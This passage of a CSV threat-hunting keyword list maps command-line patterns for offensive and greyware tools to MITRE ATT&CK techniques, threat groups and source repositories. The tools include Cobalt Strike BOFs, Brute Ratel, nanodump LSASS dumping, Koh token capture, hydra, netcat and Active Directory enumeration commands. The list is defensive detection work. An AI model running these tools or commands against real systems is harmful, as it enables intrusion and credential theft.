T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth","greyware_tool_keyword","powershell","AD module Enumerate users","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"Get-ADUser -Filter {TrustedForDelegation -eq $True}","greyware_tool_keyword","powershell","AD Module Enumerate computers with Unconstrained Delegation","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"get-delegation *","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"get-delegation *","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"Get-DomainComputer -TrustedToAuth","greyware_tool_keyword","powershell","AD Module Enumerate principals with Constrained Delegation enabled","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"Get-DomainUser -TrustedToAuth","greyware_tool_keyword","powershell","AD Module Enumerate principals with Constrained Delegation enabled","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"Get-GPO -All","greyware_tool_keyword","powershell","AD Module GroupPolicy - List of GPO in the domain","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"Get-NetGroup -FullData*","greyware_tool_keyword","powershell","Find groups in the current domain (PowerView)","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"getprivs","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"get-spns *","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"grab_token *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"hydra -*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"Impacket *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"impersonate *\*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"import boko*","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","0","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" +"inceptor*dotnet*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"kerberoast *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"koh exit*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"koh list*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"Ladon *-* *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"Ladon *.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"Ladon */* *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"Ladon Mac * ","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"Lapsdump *","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"ldapsearch -h * -x*","greyware_tool_keyword","ldapsearch","ldapsearch to enumerate ldap","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://man7.org/linux/man-pages/man1/ldapsearch.1.html","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"LdapSignCheck *","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","0","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" +"ldeep *","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" +"list_exports *.dll*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"load *.cna","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"make_token *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"make_token *","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","0","N/A","10","10","153","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" +"masscan *","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"memdump *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"memex /*.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"memhunt *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"na.exe *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"nanodump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"nc -vz *","greyware_tool_keyword","netcat","Netcat is a featured networking utility which reads and writes data across network connections. using the TCP/IP protocol It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time. it is a feature-rich network debugging and exploration tool. since it can create almost any kind of connection you would need and has several interesting built-in capabilities","T1043 - T1052 - T1071 - T1095 - T1132 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","http://netcat.sourceforge.net/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"needle_sift *","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","0","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" +"net.recon *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"nikto -*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" +"nimplant","offensive_tool_keyword","nimplant","user agent default field - A 